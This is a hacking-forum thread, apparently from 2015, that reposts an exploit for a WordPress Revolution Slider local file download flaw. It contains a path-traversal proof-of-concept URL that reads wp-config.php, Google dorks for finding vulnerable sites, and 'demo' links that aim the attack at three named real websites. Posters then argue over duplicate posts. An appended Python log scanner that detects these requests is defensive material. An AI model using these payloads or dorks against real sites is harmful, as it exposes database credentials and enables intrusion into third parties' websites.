Aerosol Posted January 27, 2015

[+] Title: Wordpress slider revolution local file download
[+] Date: 2015-01-25
[+] Author: JOK3R
[+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/
[+] Tested on: windows 7 / firefox , kali linux / firefox
[+] Vulnerable Files: /plugins/revolution-slider/
[+] Dork : "Index of" /wp-content/plugins/revolution-slider/

### POC:
http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php

### Demo:
http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php

### Credits:
[+] Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS*
And All iranian Hacker's And Exploiter's <3
[+] iran-cyber.in

Kalashnikov. Posted January 27, 2015

https://rstforums.com/forum/94729-wordpress-revslider-local-file-disclosure.rst?highlight=revslider

???? Have you run out of things to copy, so you've started making duplicate posts?

Aerosol Posted January 27, 2015

[+] Title: Wordpress slider revolution local file download
[+] Date: 2015-01-25
[+] Author: JOK3R
[+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/
[+] Tested on: windows 7 / firefox , kali linux / firefox
[+] Vulnerable Files: /plugins/revolution-slider/
[+] Dork : "Index of" /wp-content/plugins/revolution-slider/

&

# Exploit Title: [Wordpress RevSlider Plugin LFD]
# Google Dork: inurl:/admin-ajax.php?action=revslider_show_image
# Date: 12/29/14
# Exploit Author: FarbodEZRaeL
# Vendor Homepage: iranhack.org
# Software Link: wordpress.org
# Tested on: windows

Mind your own business.

Kalashnikov. Posted January 27, 2015

"& Mind your own business."

It's the same crap, why are you posting it twice? +

Bit-ul Posted January 27, 2015

"It's the same crap, why are you posting it twice? +"

The code looks different and he didn't notice.

Gio33 Posted January 27, 2015

https://rstforums.com/forum/89150-revslider-4-6-security-vulnerability.rst?highlight=revslider

Mhm .. 09/2014

admin-ajax.php?action=revslider_show_image
vs
admin-ajax.php?action=revolution-slider_show_image

Same shit.

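A defender-side check for the request pattern compared in this thread, added here as an example (it is not code from any of the posters): it scans web server access logs for either action name combined with an `img` value that contains a traversal segment or points to a PHP file. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Both action names that appear in the thread's request URLs.
ACTIONS = {"revslider_show_image", "revolution-slider_show_image"}
# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def is_lfd_probe(request_target):
    """True if the target is a show_image request whose img value
    has a '..' path segment or names a .php file."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    query = parse_qs(parts.query)  # parse_qs percent-decodes the values
    if not ACTIONS.intersection(query.get("action", [])):
        return False
    for img in query.get("img", []):
        img = img.replace("\\", "/").lower()
        if ".." in img.split("/") or img.endswith(".php"):
            return True
    return False

def scan(log_lines):
    """Return 'client_ip request_target' for every suspicious line."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and is_lfd_probe(match.group(1)):
            hits.append(line.split()[0] + " " + match.group(1))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Jan/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3121',
    '203.0.113.7 - - [27/Jan/2015:10:01:05 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revolution-slider_show_image&img=..%2Fwp-config.php HTTP/1.1" 200 3121',
    '198.51.100.4 - - [27/Jan/2015:10:02:11 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=uploads/2015/01/banner.jpg HTTP/1.1" 200 48211',
    '198.51.100.9 - - [27/Jan/2015:10:03:40 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 58',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A flagged request that was answered with status 200 means the contents of `wp-config.php`, including the database credentials and authentication keys, should be treated as disclosed and rotated.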